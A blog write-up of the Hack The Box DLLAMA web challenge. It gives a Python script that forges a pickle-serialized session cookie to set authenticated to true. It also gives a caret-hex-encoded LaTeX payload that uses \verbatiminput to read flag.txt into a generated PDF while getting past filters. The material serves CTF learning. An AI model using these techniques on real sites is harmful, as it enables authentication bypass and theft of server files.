Post

HackTheBox DLLAMA Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the DLLAMA Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

import base64
import pickle
import binascii
import pickletools

original_cookie = 'gASVPQAAAAAAAACMCF9fbWFpbl9flIwEVXNlcpSTlCmBlH2UKIwIdXNlcm5hbWWUjAFhlIwNYXV0aGVudGljYXRlZJSJdWIu'

pickle_data = base64.b64decode(original_cookie)
pickletools.dis(pickle_data)

class User:
    def __init__(self, username, authenticated=False):
        self.username = username
        self.authenticated = authenticated

decoded_cookie = base64.b64decode(original_cookie)
user = pickle.loads(decoded_cookie)
user.authenticated = True
modified_pickle = pickle.dumps(user)
modified_cookie = base64.b64encode(modified_pickle).decode('utf-8')
print("Modified cookie:", modified_cookie)

latex_code = r"""
\documentclass{article}
\usepackage{verbatim}

\begin{document}

\section{flag.txt}
\verbatiminput{flag.txt}

\end{document}
"""

byte_representation = latex_code.encode('utf-8')
hex_representation = binascii.hexlify(byte_representation).decode('utf-8')
formatted_output = ''
for i in range(0, len(hex_representation), 2):
    hex_pair = hex_representation[i:i+2]
    if hex_pair == '0a':
        formatted_output += '\n'
    else:
        formatted_output += f"^^{hex_pair}"

print(formatted_output)

Copy the modified cookie and navigate to /. Paste the generated payload into the LaTeX-to-PDF parser:

1
2
3
4
5
6
7
8
9

^^5c^^64^^6f^^63^^75^^6d^^65^^6e^^74^^63^^6c^^61^^73^^73^^7b^^61^^72^^74^^69^^63^^6c^^65^^7d
^^5c^^75^^73^^65^^70^^61^^63^^6b^^61^^67^^65^^7b^^76^^65^^72^^62^^61^^74^^69^^6d^^7d

^^5c^^62^^65^^67^^69^^6e^^7b^^64^^6f^^63^^75^^6d^^65^^6e^^74^^7d

^^5c^^73^^65^^63^^74^^69^^6f^^6e^^7b^^66^^6c^^61^^67^^2e^^74^^78^^74^^7d
^^5c^^76^^65^^72^^62^^61^^74^^69^^6d^^69^^6e^^70^^75^^74^^7b^^66^^6c^^61^^67^^2e^^74^^78^^74^^7d

^^5c^^65^^6e^^64^^7b^^64^^6f^^63^^75^^6d^^65^^6e^^74^^7d

Download the generated PDF, which contains the flag.

Summary

DLLAMA is a medium-level challenge on Hack The Box that exploits insecure deserialization and LaTeX-to-PDF injection. A serialized cookie is decoded, modified to authenticate the user, and re-encoded to access restricted areas. A crafted LaTeX payload embeds the content of flag.txt into a PDF. Submitting the payload through the document parser reveals the flag in the generated PDF.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.